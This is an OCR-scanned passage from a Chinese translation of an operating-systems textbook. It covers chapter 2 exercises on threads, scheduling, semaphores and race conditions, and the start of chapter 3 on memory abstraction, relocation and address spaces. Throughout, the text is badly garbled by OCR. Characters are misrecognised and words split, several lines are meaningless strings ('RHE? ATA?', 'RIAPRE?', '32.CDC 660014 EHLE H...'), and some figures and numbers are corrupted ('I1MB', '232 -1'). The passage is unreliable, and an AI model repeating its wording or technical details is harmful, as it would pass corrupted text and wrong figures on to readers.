时 ， 需 要 一 个 磁盘 操作 ， 要 男 外 花 避 75ms， 此 时 该 线程 进入 睡眠 。 在 单 
线程 情形 下 服务 器 每 秒 钟 可 以 处 理 多 少 个 请 求 ? 如 果 是 多 线程 呢 ? 





14. 在 用 户 空 间 实 现 线程 ， 其 最 大 的 优点 是 什么 ? 最 大 的 缺点 是 什 


» 
~ 


15. 在 图 2-15 中 创建 线程 和 线程 打印 消息 十 随机 交织 在 一 起 的 。 有 没 
有 方法 可 以 严格 按照 以 下 次 序 运行 : 创建 线程 1， 线 程 1 打印 消 轧 ， 线 程 
1 结束 ， 创 建 线 程 2， 线 程 2 打印 消息 ， 线 程 2 结 束 ， 以 此 类 推 。 如 果 有 ， 
是 什么 方法 ， 如 果 没 有 请 解释 原因 。 


16. 在 讨论 线程 中 的 全 局 变量 时 ， 曾 使 用 过 程 create_global 将 存储 分 
配给 指 加 变量 的 指针 ， 而 不 是 变量 自身 。 这 是 必需 的 ， 还 是 由 于 该 过 程 
也 需要 使 用 这 些 值 ? 








17. 考 虑 线程 全 部 在 用 户 空间 实现 的 一 个 系统 ， 其 中 运行 时 系统 每 
秒 钟 得 到 一 个 时 钟 中 断 。 假 设 在 该 运行 时 系统 中 ， 当 某 个 线程 正在 执行 
时 发 生 一 个 时 钟 中 断 ， 此 时 会 出 现 什么 问题 ?你 有 什么 解决 该 问题 的 建 
议 吗 ? 


18. 假 设 一 个 操作 系统 中 不 存在 类 似 于 select 的 系统 调用 来 提前 了 解 
在 从 文件 、 管 道 或 设备 中 读 取 时 是 否 安全 ， 不 过 该 操作 系统 确实 允许 设 
置 报警 时 钟 ， 以 便 中 断 阻 豆 的 系统 调用 。 在 上 述 条 件 下 ， 是 否 有 可 能 在 





用 户 空间 中 实现 一 个 线程 包 ? 请 加 以 讨论 。 


19. 在 2.3.4 节 中 所 讨论 的 优先 级 反 转 问题 是 否 可 能 在 用 户 级 线程 中 
RHE? ATA? 


20. 在 2.3.4 市 中 ， 摘 述 了 一 种 有 高 优先 级 进程 H 和 低 优 先 级 进程 的 
情况 ， 导 致 了 H 陷 入 死 循 环 。 若 采用 轮转 调度 算法 而 不 是 优先 级 调度 算 
法 ， 还 会 发 生 同 样 问题 吗 ? 请 给 予 讨 论 。 


21. 在 使 用 线程 的 系统 中 ， 大 使 用 用 户 级 线程 ， 是 每 个 线程 一 个 夫 
栈 还 是 每 个 进程 一 个 堆栈 ? 如 采 使 用 内 核 级 线程 情况 义 如 何 呢 ? 请 给 予 





22. 在 开发 计算 机 时 ， 通 种 首先 用 一 个 程序 模拟 ， 一 次 运行 一 条 指 
令 ， 甚 至 多 处 理 器 也 严格 按 此 模拟 。 在 类 似 于 这 种 没有 同时 事件 发 生 的 
青 形 下， 会 出 现 竞 争 条件 吗 ? 


Ss 


23. 两 个 进程 在 一 个 共享 存储 器 多 处 理 器 〈 即 两 个 CPU) 上 运行 ， 当 
它们 要 共享 一 个 公共 内 存 时 ， 图 2-23 所 示 的 采用 变量 turn 的 忙 等 待 解决 
方案 还 有 效 吗 ? 








24. 在 进程 调度 是 抢占 式 的 情形 下 ， 图 2-24 中 展示 的 互 斥 问题 的 
Peterson 解 法 能 正常 工作 吗 ? 如 果 是 非 抢 占 式 的 情况 呢 ? 





25. 给 出 一 个 可 以 屏蔽 中 断 的 操作 系统 如 何 实现 信号 量 的 框 以 。 





26. 请 说 明 计 数 信 号 量 〈 即 可 以 保持 一 个 任意 值 的 信号 量 ) 如 何 仪 
通过 二 元 信号 量 和 普通 机 器 指令 实现 。 

27. 如 条 一 个 系统 只 有 两 个 进程 ， 可 以 使 用 一 个 屏障 来 同步 这 两 个 
进程 吗 ? 为 什么 ? 


28. 如 采 线 程 在 内 核 中 实现 ， 可 以 使 用 内 核 信号 量 对 同一 个 进程 中 
的 两 个 线程 进行 同步 吗 ? 如 果 线 程 在 用 户 空 间 实 现 呢 ? 假设 在 其 他 进程 


中 没有 线程 必须 访问 该 信号 量 。 请 讨论 你 的 答案 。 








29. 管 程 内 的 同步 机 制 使 用 条 件 变量 和 两 个 特殊 操作 wait 和 signal。 
一 种 更 通用 的 同步 形式 是 只 用 一 条 原 语 waituntil， 它 以 任意 的 布尔 谓词 
作为 参数 。 例 如 








waituntil x<0 or ytz<n 








这 样 就 不 再 需要 signal 原 语 。 很 显然 这 一 方式 比 Hoare 或 Brinch 
Hansen 方 案 更 通用 ， 但 它 从 未 被 采用 过 。 为 什么 ? 提示: 请 考虑 其 实 
现 。 


30. 一 个 快餐 店 有 四 类 雇员 : (1) 领班 ， 接 收 顾 客 点 的 沫 单 ; 
(2) 厨师， 准备 饭 菜 ，〈3) 打包 工 ， 将 饭菜 六 在 袋子 里 ;，〈4) 收银 
员 ， 将 食品 袋 交 给 顾客 并 收 钱 。 每 个 雇员 可 被 看 作 一 个 进行 通信 的 顺序 
进程 。 它 们 采用 的 进程 间 通 信 方 式 是 什么 ? 请 将 这 个 模型 与 UNIX 中 进 





程 联系 起 来 。 


31. 假 设 有 一 个 使 用 信箱 的 消息 传递 系统 ， 当 问 满 信箱 发 消 妃 或 从 
空 信箱 收 消息 时 ， 进 程 都 不 会 阻 昧 ， 相 反 ， 会 得 到 一 个 错误 代码 。 进 程 
啊 应 错误 代码 的 处 理 方式 为 一 人 吉 一 裔 地 重 试 ， 直 到 成 功 为 止 。 这 种 方式 
RIAPRE? 





32.CDC 660014 EHLE H — PHAR TE Sch EE Ar FG EEF A RE FE Fe VE E 
法 ， 它 可 以 同时 处 理 多 达 10 个 MO 进程 。 每 条 指令 结束 后 都 进行 进程 切 
换 ， 这 样 进 程 1 执行 指令 1， 进 程 2 执行 指令 2， 以 此 类 推 。 进 程 切换 由 特 
殊 人 硬件 完成 ， 所 以 没有 开销 。 如 果 在 没有 竞争 的 条 件 下 一 个 进程 需要 T 
秒 钟 完成 ， 那 么 当 有 n 个 进程 共享 处 理 咒 时 完成 一 个 进程 需要 多 长 时 
间 ? 





33. 是 否 可 以 通过 分 析 源 代码 来 确定 进程 是 CPU 密 集 型 的 还 是 LO 密 
集 型 的 ?如 何 能 在 运行 时 刻 进行 此 项 决定 ? 


34. 在 “ 何 时 调度 ”一 节 中 曾 提 到 ， 有 时 一 个 重要 进程 可 以 在 选择 下 一 
个 被 阻塞 进程 进入 运行 的 过 程 中 发 挥 作用 ， 从 而 改善 调度 性 能 。 请 给 出 
可 以 这 样 做 的 情形 并 解释 如 何 做 。 

35. 对 某 系 统 进行 监测 后 表明 ， 当 阻塞 在 1/O 之 前 时 ， 平 均 每 个 进程 
运行 时 间 为 T。 一 次 进程 切换 需要 的 时 间 为 Ss， 这 里 S 实 际 上 就 是 开销 。 
对 于 采用 时 间 片 长 度 为 Q 的 轮转 调度 ， 请 给 出 以 下 各 种 情况 中 CPU 利用 


率 的 计算 公式 : 
a)Q=00 
b)Q>T 
c)S<Q<T 
d)Q=S 
e)Q 趋 近 于 0 


36. 有 5 个 待 运行 作业 ， 佑 计 它 们 的 运行 时 间 分 别 是 9，6，3，5 和 
X。 采 用 哪 种 次 序 运 行 这 些 作 业 将 得 到 最 短 的 平均 响应 时 间 ? (答案 将 
依赖 于 又 。 ) 








37. 有 5 个 批 处 理 作业 A 到 E， 它 们 几乎 同时 到 达 一 个 计算 中 心 。 估 计 
它们 的 运行 时 间 分 别 为 10，6，2，4 和 8 分 钟 。 其 优先 级 (由 外 部 设 定 ) 
分 别 为 3，5，2，1 和 4， 其 中 5 为 最 高 优先 级 。 对 于 下 列 每 种 调度 算法 ， 
计算 其 平均 进程 周转 时 间 ， 可 名 略 进程 切换 的 开销 。 


a) 轮 转 法 。 
b) 优 先 级 调度 。 


吕 先 来 先 服务 (按照 10，6，2，4，8 次 序 运行 )。 


dj) 最 短 作 业 优 先 。 


对 a)， 假 设 系 统 上 共有 多 道 程序 处 理 能 力 ， 每 个 作业 均 公平 共享 CPU 
时 间 ， 对 b) 到 qd)， 假 设 任 一 时 刻 只 有 一 个 作业 运行 ， 直 到 结束 。 所 有 的 
作业 都 完全 是 CPU 密集 型 作业 。 


运行 在 CTSS 上 的 一 个 进程 需要 30 个 时 间 片 完成 。 该 进程 必须 被 
调 入 多 少 次 ， 包 括 第 一 次 在 该 进程 运行 之 前 )? 


39. 能 找到 一 个 使 CTSS 优 先 级 系统 不 受 随 机 回 车 链 患 弄 的 方法 吗 ? 





40.a=1/2 的 老化 算法 用 来 预测 运行 时 间 。 先 前 的 四 次 运行 ， 从 最 老 
的 一 个 到 最 近 的 一 个 ， 其 运行 时 间 分 别 是 40ms，20ms，40ms 和 15ms。 


下 一 次 的 预测 时 间 是 多 少 ? 





41. 一 个 软 实时 系统 有 4 个 周期 时 间 ， 其 周期 分 别 为 50ms，100ms， 
200ms 和 250ms。 假 设 这 4 个 事件 分 别 需 要 35ms，20ms，10ms 和 x ms 的 
CPU 了 时间。 保持 系统 可 调度 的 最 大 x 值 是 多 少 ? 








42. 请 解释 为 什么 两 级 调度 比较 常用 。 


43. 一 个 实时 系统 需要 处 理 两 个 语音 通信 ， 每 个 运行 5ms， 然 后 每 次 
突 发 消耗 1ms CPU 时 间 ， 加 上 25 帧 / 秒 的 一 个 视频 ， 每 一 帧 需要 20ms 的 
CPU 时 间 。 这 个 系统 是 可 调度 的 吗 ? 


44. 考 虑 一 个 系统 ， 在 这 个 系统 中 为 了 内 核 线程 调度 希望 将 策略 和 
机 制 分 离 。 请 提出 一 个 实现 此 目标 的 手段 。 


45. 在 哲学 家 就 餐 问 题 的 解法 〈 图 2-46) 中 ， 为 什么 在 过 程 
take_forks 中 将 状态 变量 置 为 HUNGRY? 


46. 考 虑 图 2-46 中 的 过 程 put_forks， 假 设 变量 state[i] 在 对 test 的 两 次 调 
用 之 后 而 不 是 之 前 被 置 为 THINKING。 这 个 改动 会 对 解法 有 什么 影响 ? 





47. 按 照 哪 一 类 进程 何 时 开始 ， 读 者 - 写 者 问题 可 以 有 硝 干 种 方式 求 
解 。 请 详细 描述 该 问题 的 三 种 变 体 ， 每 一 种 变 体 俩 好 《或 不 侦 好 ) FE 
类 进程 。 对 每 种 变 体 ， 请 指出 当 一 个 读者 或 写 者 访问 数据 库 时 会 发 生 什 
么 ， 以 及 当 一 个 进程 结束 对 数据 库 的 访问 后 又 会 发 生 什么 ? 








48. 请 编写 一 个 shell 脚 本 ， 通 过 读 取 文件 的 最 后 一 个 数字 ， 对 之 加 
1， 然 后 再 将 该 数字 附 在 该 文件 上 ， 从 而 生成 顺序 数 文件 。 在 后 台 和 前 
台 分 别 运行 该 脚本 的 一 个 实例 ， 每 个 实例 访问 相同 的 文件 。 需 要 多 长 时 
间 才 出 现 竞 争 条 件 ? 临界 区 是 什么 ?请 修改 该 脚本 以 避免 竞争 (提示 : 
使 用 In file file.lock 锁 住 数 据 文件 。) 





49. 假 设 有 一 个 提供 信号 量 的 操作 系统 。 请 实现 一 个 消 思 系统， 纺 
写 太 送 和 接收 消息 的 过 程 。 








50. 使 用 管 程 而 不 是 信号 量 来 解决 哲学 家 就 餐 问 题 。 


51. 假 设 一 个 大 学 为 了 卖弄 其 政治 上 的 正确 性 ， 准 备 把 美国 最 高 法 
院 的 信条 “平等 但 隅 离 其 本 身 就 是 不 平等 〈Separate but equal is inherently 
unequal) ” 既 运 用 在 种 族 上 也 运 在 性 别 上 ， 从 而 结束 校园 内 长 期 使 用 的 
浴室 按 性 别 隔离 的 做 法 。 但 是 ， 为 了 迁就 传统 习惯 ， 学 校 颁布 法 令 : 当 
有 一 个 女生 在 浴室 里 ， 那 么 其 他 女生 可 以 进入 ,但 是 男生 不 行 ， 反 之 亦 
然 。 在 每 个 浴室 的 门 上 有 一 个 滑动 指示 符 写 ， 表 示 当 前 处 于 以 下 三 种 可 




















用 你 偏好 的 程序 设计 语言 编写 下 面 的 过 程 : 
woman_wants_to_enter, man_wants_to_enter, woman_leaves, 


man_leaves。 可 以 随意 采用 所 希望 的 计数 器 和 同步 技术 。 
52. 重 写 图 2-23 中 的 程序 ， 以 便 能 够 处 理 两 个 以 上 的 进程 。 


53. 编 写 一 个 使 用 线程 并 共享 一 个 公共 缓冲 区 的 生产 者 -消费 者 问 
题 。 但 是 ， 不 要 使 用 信号 量 或 任何 其 他 用 来 保护 共享 数据 结构 的 同步 原 
语 。 直 接 让 每 个 线程 在 需要 访问 时 就 访问 。 使 用 sleep 和 wakeup 来 处 理 满 
和 空 的 条 件 。 观 察 需 要 多 长 时 间 会 出 现 严 重 的 竞争 条 件 。 例 如 ， 可 以 让 








生产 者 一 会 儿 打 印 一 个 数字 ， 每 分 钟 打印 不 要 超过 一 个 数字 ， 因 为 IO 
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第 3 章 ”存储 管理 


内 存 CRAM) 是 计算 机 中 一 种 需要 认真 管理 的 重要 资源 。 就 目前 
来 说 ， 虽 然 一 台 普 通 家 用 计算 机 的 内 存 容量 已 经 是 20 世 纪 60 年 代 早 期 全 
球 最 大 的 计算 机 IBM 7094 的 内 存 容量 的 10 000 倍 以 上 ， 但 是 程序 大 小 的 
增长 速度 比 内 存 容量 的 增长 速度 要 快 得 多 。 正 如 由 金森 定律 所 指出 
的 : “不 管 存储 器 有 多 大 ， 程 序 都 可 以 把 它 填 满 ”。 在 这 一 章 中 ， 我 们 将 
讨论 操作 系统 是 怎样 对 内 存 创建 抽象 模型 以 及 怎样 管理 内 存 的 。 

















每 个 程序 员 都 梦想 拥有 这 样 的 内 存 : 它 是 私有 的 、 容 量 无 限 大 的 、 
速度 无 限 快 的 ， 并 且 是 永久 性 的 存储 器 〈 即 断 电 时 不 会 丢失 数据 ) © 
我 们 期 望 这 样 的 内 存 时 ， 何 不 进一步 要 求 它 价格 低廉 呢 ? 遗憾 的 是 ， 目 
前 的 技术 还 不 能 为 我 们 提供 这 样 的 内存 。 也 许 你 会 有 解决 方案 。 


除 此 之 外 的 选择 是 什么 呢 ? 经 过 多 年 探索 ， 人 们 提出 了 “分 层 存 储 
an Vk 4%” (memory hierarchy) 的 概念 ， 即 在 这 个 体系 中 ， 计 算 机 有 寿 干 
J& (MB) WR, maHa REWERA (cache), XFA (GB) 
速度 与 价格 适中 且 同 样 易 失 性 的 内 存 ， 以 及 几 兆 兆 〈TB) 低速 、 廉 
价 、 非 易 失 性 的 磁盘 存储 ， 另 外 还 有 诸如 DVD 和 USB 等 可 移动 存储 装 
置 。 操 作 系统 的 工作 是 将 这 个 存储 体系 抽象 为 一 个 有 用 的 模型 并 管理 这 
个 抽象 模型 。 








操作 系统 中 管理 分 层 存储 器 体系 的 部 分 称 为 存储 管理 器 “memory 
manager) 。 它 的 任务 是 有 效 地 管理 内 存 ， 即 记录 哪些 内 存 是 正在 使 用 
的 ， 哪 些 内 存 是 空 帮 的 ;， 在 进程 需要 时 为 其 分 配 内 存 ， 在 进程 使 用 完 后 
释放 内 存 。 





本 章 我 们 会 研究 儿 个 不 同 的 存储 定理 方 采 ， 涵 盖 非 常 简 单 的 方 采 到 
高 度 复 杂 的 方案 。 由 于 最 底层 的 高 速 缓存 的 管理 由 硬件 来 完成 ， 本 章 将 
集中 介绍 针对 编程 人 员 的 内 存 模 型 ， 以 及 怎样 优化 管理 内 存 。 至 于 永久 
性 存储 器 一 一 磁盘 一 一 的 抽象 和 管理 ， 则 是 下 一 章 的 主题 。 我 们 会 从 最 
简单 的 管理 方案 开始 讨论 ， 并 逐步 深入 到 更 为 续 密 的 方案 。 








3.1 无 存储 器 抽象 


最 简单 的 存储 妖 抽象 就 是 根本 没有 抽象 。 早 期 大 型 计算 机 (20 世纪 
60 年 代 之 前 ) 、 小 型 计算 机 《20 世 纪 70 年 代 之 前 ) 和 个 人 计算 机 〈20 世 
纪 80 年 代 之 前 ) 都 没有 存储 器 抽象 。 每 一 个 程序 都 直接 访问 物理 内 人 存 。 
当 一 个 程序 执行 如 下 指令 : 








MOV REG 








nN 
H 





ER1,1000 





计算 机 会 将 位 置 为 1000 的 物理 内 存 中 的 内 容 移 到 REGISTER1 中 。 
因此 ， 那 时 呈现 给 编程 人 员 的 存储 器 模型 就 是 简单 的 物理 内 存 : 从 0 到 
某 个 上 限 的 地 址 集合 ， 每 一 个 地 址 对 应 一 个 可 容纳 一 定数 目 二 进 制 位 的 


存储 单元 ， 通 常 是 8 个 。 








在 这 种 情况 下 ， 要 想 在 内 存 中 同时 运行 两 个 程序 是 不 可 能 的 。 如 果 
第 一 个 程序 在 2000 的 位 置 写 入 一 个 新 的 值 ， 将 会 探 掉 第 二 个 程序 存放 在 
相同 位 置 上 的 所 有 内 容 ， 所 以 同时 运行 两 个 程序 是 根本 行 不 通 的 ， 这 两 


个 程序 会 立刻 导演 。 





不 过 即使 存储 器 模型 就 是 物理 内 存 ， 还 是 存在 一 些 可 行 选项 的 。 图 
3-1 展 示 了 三 种 变 体 。 在 图 3-1a 中 ， 操 作 系 统 位 于 RAM 《随机 访问 存储 
器 ) 的 底部 ， 在 图 3-1b 中 ， 操 作 系 统 位 于 内 存 顶端 的 ROM (只 读 存 储 


器 〉 中 ; 而 在 图 3-1c 中 ， 设 备 驱动 程序 位 于 内 存 顶端 的 ROM 中 ， 而 操作 
系统 的 其 他 部 分 则 位 于 下 面 的 RAM 的 底部 。 第 一 种 方案 以 前 被 用 在 大 
型 机 和 小 型 计算 机 上 ， 现 在 很 少 使 用 了 。 第 二 种 方案 被 用 在 一 些 掌上 电 
脑 和 上 磐 入 式 系统 中 。 第 三 种 方案 用 于 早期 的 个 人 计算 机 中 《例如 运行 
MS-DOS 的 计算 机 ) ， 在 ROM 中 的 系统 部 分 称 为 BIOS (Basic Input 
Output System， 基 本 输入 输出 系统 ) 。 第 一 种 方案 和 第 三 种 方案 的 缺点 
是 用 户 程 序 出 现 的 错误 可 能 摧毁 操作 系统 ， 引 发 灾难 性 后 果 【〔 比 如 算 改 
磁盘 ) 。 








OxFFF ... 位 于 ROM 中 的 
设备 驱动 程序 










位 于 ROM 中 
的 操作 系统 


用 户 程序 
用 户 程序 


位 于 RAM 中 
的 操作 系统 


位 于 RAM 中 
的 操作 系统 





a) b) 9 


图 31 在 只 有 操作 系统 和 一 个 用 户 进程 的 情形 下 ， 组 织 内 存 的 三 种 
简单 方法 (当然 也 存在 其 他 方案 ) 


当 按 这 种 方式 组 织 系统 时 ， 通 常 同一 个 时 刻 只 能 有 一 个 进程 在 运 


行 。 一 旦 用 户 键入 了 一 个 命令 ， 操 作 系 统 就 把 需要 的 程序 从 磁盘 复制 到 
内 存 中 并 执行 ， 当 进程 运行 结束 后 ， 操 作 系 统 在 用 户 终端 显示 提示 符 并 


等 等 新 的 命令 。 收 到 新 的 命令 后 ， 它 把 新 的 程序 装 入 内 存 ， 窗 盖 前 一 个 
程序 。 


在 没有 内 存 抽 象 的 系统 中 实现 并 行 的 一 种 方法 是 使 用 多 线程 来 编 
程 。 由 于 在 引入 线程 时 就 假设 一 个 进程 中 的 所 有 线程 对 同一 内 存 映 像 都 
可 见 ， 那 么 实现 并 行 也 就 不 是 问题 了 。 虽 然 这 个 想法 行 得 通 ， 但 却 没 有 
被 广泛 使 用 ， 因 为 人 们 通常 希望 能 够 在 同一 时 间 运 行 没 有 关联 的 程序 ， 
而 这 正 古 线程 抽象 所 不 能 提供 的 。 更 进一步 地 ， 一 个 没有 内 存 抽象 的 系 
统 也 不 大 可 能 具有 线程 抽象 的 功能 。 














在 不 使 用 内 存 抽 象 的 情况 下 运行 多 道 程序 


但 是 ， 即 使 没有 内 存 抽象 ， 同 时 运行 多 个 程序 也 是 可 能 的 。 操 作 系 
统 只 需要 把 当前 内 存 中 所 有 内 容 保 存 到 磁盘 文件 中 ， 然 后 把 下 一 个 程序 
读 入 到 内 存 中 再 运行 即 可 。 只 要 在 茶 一 个 时 间 内 存 中 只 有 一 个 程序 ， 那 
么 就 不 会 发 生 冲 突 。 这 样 的 交换 概念 会 在 下 面 讨论 。 








在 特殊 硬件 的 帮助 下 ， 即 使 没有 交换 功能 ， 并 发 地 运行 多 个 程序 也 
是 可 能 的 。IBM 360 的 早期 模型 是 这 样 解决 的 ， 内 存 被 划分 为 2KB 的 
块 ， 每 个 块 被 分 配 一 个 4 位 的 保护 键 ， 保 护 键 存储 在 CPU 的 特殊 寄存 器 
中 。 一 个 内 存 为 I1MB 的 机 器 只 需要 512 个 这 样 的 4 位 寄存 器 ， 容 量 总 共 为 
256 字 节 。PSW (Program Status Word， 程 序 状态 字 ) 中 存 有 一 个 4 位 
码 。 一 个 运行 中 的 进程 如 果 访 问 保护 键 与 其 PSW 码 不 同 的 内 存 ，360 的 





便 件 会 捕获 到 这 一 事件 。 因 为 只 有 操作 系统 可 以 修改 保护 键 ， 这 样 就 可 
以 防止 用 户 进 程 之 间 、 用 户 进 程 和 操作 系统 之 间 的 互相 干扰 。 


然而 ， 这 种 解决 方法 有 一 个 重要 的 缺陷 。 如 图 3-2 所 示 ， 假 设 我 们 
有 两 个 程序 ， 每 个 大 小 各 为 16KB， 如 图 3-2a 和 图 3-2b 所 示 。 前 者 加 了 阴 
影 表 示 它 和 后 者 使 用 不 同 的 内 存 键 。 第 一 个 程序 一 开始 就 跳 转 到 地 址 
24， 那 里 是 一 条 MOV 指 令 。 第 二 个 程序 一 开始 跳 转 到 地 址 28， 那 里 是 
一 条 CMP 指 令 。 与 讨论 无 关 的 指令 没有 男 出 来 。 当 两 个 程序 被 连续 地 装 
载 到 内 存 中 从 0 开始 的 地 址 时 ， 内 存 中 的 状态 就 如 同 图 3-2c 所 示 。 在 这 
个 例子 里 ， 我 们 假设 操作 系统 是 在 高 地 址 处 ， 图 中 没有 男 出 来 。 
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图 32 重 定位 问题 的 说 明 : 四 一 个 16KB 程 序 ; 日 另 一 个 16KB 程 序 ; o 
两 个 程序 连续 地 装载 到 内 存 中 


程序 装载 完毕 之 后 束 可 以 运行 了 。 由 于 它们 的 内 存 键 不 同 ， 它 们 不 
会 破坏 对 方 的 内 存 。 但 在 另 一 方面 会 发 生 问 题 。 当 第 一 个 程序 开始 运行 
时 ， 它 执行 了 JMP 24 指 令 ， 然 后 不 出 预料 地 跳 转 到 了 相应 的 指令 ， 这 个 
程序 会 正常 运行 。 














但 是 ， 当 第 一 个 程序 已 经 运行 了 一 段 时 间 后 ， 操 作 系统 可 能 会 决定 
开始 运行 第 二 个 程序 ， 即 装载 在 第 一 个 程序 之 上 的 地 址 16 384 处 的 程 
序 。 这 个 程序 的 第 一 条 指令 是 JMP 28， 这 条 指令 会 使 程序 跳 转 到 第 一 个 
程序 的 ADD 指 令 ， 而 不 是 事先 设 定 的 跳 转 到 CMP 指 令 。 由 于 对 内 存 地 
址 的 不 正确 访问 ， 这 个 程序 很 可 能 在 1 秒 之 内 就 朋 演 了 。 





这 里 关键 的 问题 是 这 两 个 程序 都 引用 了 绝对 物理 地 址 ， 而 这 正 是 我 
们 最 需要 避免 的 。 我 们 希望 每 个 程序 都 使 用 一 套 私 有 的 本 地 地 址 来 进行 
内 存 寻 址 。 下 面 我 们 会 展示 这 种 技术 是 如 何 实现 的 。IBM 360 对 上 述 问 
题 的 补救 方案 就 是 在 第 二 个 程序 装载 到 内 存 的 时 候 ， 使 用 静态 重 定位 的 
技术 修改 它 。 它 的 工作 方式 如 下 : 当 一 个 程序 被 装载 到 地 址 16 384 时 ， 
常数 16 384 被 加 到 每 一 个 程序 地 址 上。 虽然 这 个 机 制 在 不 出 错误 的 情况 
下 是 可 行 的 ， 但 这 不 是 一 种 通用 的 解决 办 法 ， 同 时 会 减 慢 装载 速度 。 而 
且 ， 它 要 求 给 所 有 的 可 执行 程序 提供 额外 的 信息 来 区 分 哪些 内 存 字 中 存 
有 “可 重 定 位 的 ) 地 址 ， 哪 些 没有 。 毕 竟 ， 图 3-2b 中 的 “28” 需 要 被 重 定 
位 ， 但 是 像 




















MOV REGISTERI, 28 

















这 样 把 数 28 送 到 REGISTER1 的 指令 不 可 以 被 重 定 位 。 装 载 器 需要 
一 定 的 方法 来 辨别 地 址 和 常数 。 








最 后 ， 正 如 我 们 在 第 1 章 中 指出 的 ， 计 算 机 世界 的 发 展 总 是 倾 问 于 


重复 历史 。 虽 然 直接 引用 物理 地 址 对 于 大 型 计算 机 、 小 型 计算 机 、 人 台 陈 
计算 机 和 笔记 本 电脑 来 说 已 经 成 为 很 久远 的 记忆 了 《对 此 我 们 深 表 遗 
憾 ) ， 但 是 缺少 内 存 抽象 的 情况 在 能 入 式 系统 和 智能 卡 系统 中 还 是 很 党 
见 的 。 现 在 ， 像 收音 机 、 洗 衣 机 和 微波 炉 这 样 的 设备 都 已 经 完全 被 
(ROM 形 式 的 ) 软件 控制 ， 在 这 些 情况 下 ， 软 件 都 采用 访问 绝对 内 存 
地 址 的 寻 址 方式 。 在 这 些 设备 中 这 样 能 够 正常 工作 是 因为 ， 所 有 运行 的 
程序 都 是 可 以 事先 确定 的 ， 用 户 不 可 能 在 烤 面 包机 上 目 由 地 运行 他 们 目 
己 的 软件 。 








虽然 高 端的 能 入 式 系 统 〈 比 如 手机 ) 有 复杂 的 操作 系统 ， 但 是 一 般 
的 简单 鞭 入 式 系统 并 非 如 此 。 在 茶 些 情况 下 可 以 用 一 种 简单 的 操作 系 
统 ， 它 只 是 一 个 被 链接 到 应 用 程序 的 库 ， 该 库 为 程序 提供 VO 和 其 他 任 
务 所 需要 的 系统 调用 。 操 作 系 统 作 为 库 实现 的 常见 例子 如 流行 的 e-cos 操 
作 系 统 。 





3.2 一 种 存储 占 抽 象 : 地 址 空间 


忆 之 ， 把 物理 地 址 其 露 给 进程 会 带 来 下 面 儿 个 严重 问题 。 第 一 ， 如 
果 用 户 程 序 可 以 寻 址 内 存 的 每 个 字 市 ， 它 们 就 可 以 很 容易 地 《故意 地 或 
偶然 地 ) 破坏 操作 系统 ， 从 而 使 系统 慢 慢 地 停止 运行 (除非 有 特殊 的 人 硬 
件 进行 保护 ， 如 IBM 360 的 锁 键 模式 ) 。 即 使 在 只 有 一 个 用 户 进 程 运 行 
的 情况 下 ， 这 个 问题 也 是 存在 的 。 第 二 ， 使 用 这 种 模型 ， 想 要 同时 (如 
果 只 有 一 个 CPU 束 轮流 执行 运行 多 个 程序 是 很 困难 的 。 在 个 人 计算 机 
上 ， 同 时 打开 几 个 程序 是 很 常见 的 〈 一 个 文字 处 理 器 ， 一 个 邮件 程序 ， 
一 个 网 络 浏览 右 ， 其 中 一 个 当前 正在 工作 ， 其 余 的 在 按 下 鼠标 的 时 候 才 
会 被 激活 ) 。 在 系统 中 没有 对 物理 内 存 的 抽象 的 情况 下 ， 很 难 做 到 上 述 
情景 ， 因 此 ， 我 们 需要 其 他 办 法 。 











3.2.1 地 址 空间 的 概念 


要 保证 多 个 应 用 程序 同时 处 于 内 存 中 并 且 不 互相 影响 ， 则 需要 解决 
两 个 问题 : 保护 和 重 定位 。 我 们 来 看 一 个 原始 的 对 前 者 的 解决 办 法 ， 它 
曾 被 用 在 IBM 360 上 : 给 内 存 块 标记 上 一 个 保护 键 ， 并 且 比 较 执行 进程 
的 键 和 其 访问 的 每 个 内 存 字 的 保护 键 。 然 而 ， 这 种 方法 本 里 并 没有 解决 
后 一 个 问题 ， 虽 然 这 个 问题 可 以 通过 在 程序 被 装载 时 重 定 位 程序 来 解 
决 ， 但 这 是 一 个 缓慢 且 复 杂 的 解决 方法 。 








一 个 更 好 的 办 法 是 创造 一 个 新 的 内 存 抽象 :地址 空间 。 整 像 进程 的 
概念 创造 了 一 类 抽象 的 CPU 以 运行 程序 一 样 ， 地 址 空间 为 程序 创造 了 一 
种 抽象 的 内 存 。 地 址 空间 是 一 个 进程 可 用 于 寻 址 内 存 的 一 套 地 址 集合 。 
每 个 进程 都 有 一 个 目 己 的 地 址 空间 ， 并 且 这 个 地 址 空间 独立 于 其 他 进程 
的 地 址 空间 《除了 在 一 些 特殊 情况 下 进程 需要 共 孕 它们 的 地 址 空间 
Sh) x 





地 址 空间 的 概念 非常 通用 ， 并 且 在 很 多 场合 中 出 现 。 比 如 电话 号 
码 ， 在 美国 和 很 多 其 他 国家 ， 一 个 本 地 电话 号 码 通常 是 一 个 7 位 的 数 
字 。 因 此 ， 电 话 号 码 的 地 址 空间 是 从 0 000 000 到 9 999 999, BIA — HES 
码 并 没有 被 使 用 ， 比 如 以 000 开 头 的 号 码 。 随 着 手机 、 调 制 解 调 器 和 传 
真 机 数量 的 增长 ， 这 个 空间 变 得 越 来 越 不 够 用 了 ， 从 而 导致 需要 使 用 更 
多 位 数 的 号 码 。Pentium 的 VO 端口 的 地 址 空间 从 0 到 16 383。IPV4 的 地 址 
是 32 位 的 数字 ， 因 此 它们 的 地 址 空间 从 0 到 232 -1 (也 有 一 些 保留 数 


ry 


Tg 


地 址 空间 可 以 不 是 数字 的 。 一 套 “.com” 的 互联 网 域名 也 是 地 址 空 
间 。 这 个 地 址 空间 是 由 所 有 包含 2~63 个 字符 并 且 后 面 跟 着 “.com” 的 字 
符 吕 组 成 的 ， 组 成 这 些 字符 串 的 字符 可 以 是 字母 、 数 字 和 连 字符 。 到 现 
在 你 应 该 已 经 明白 地 址 空间 的 概念 了 。 它 是 很 简单 的 。 


比较 难 的 是 给 每 个 程序 一 个 自己 的 地 址 空间 ， 使 得 一 个 程序 中 的 地 
址 28 所 对 应 的 物理 地 址 与 男 一 个 程序 中 的 地 址 28 所 对 应 的 物理 地 址 不 





同 。 下 面 我 们 将 讨论 一 个 简单 的 方法 ， 这 个 方法 曾经 很 常见 ， 但 是 在 有 
能 力 把 更 复 淋 《而 且 更 好 〉 的 机 制 运 用 在 现代 CPU 心 片上 之 后 ， 这 个 方 
法 就 不 再 使 用 了 。 


基 址 寄存 器 与 界限 寄存 器 





这 个 简单 的 解决 办 法 使 用 一 种 简单 的 动态 重 定位 。 它 所 做 的 是 简单 
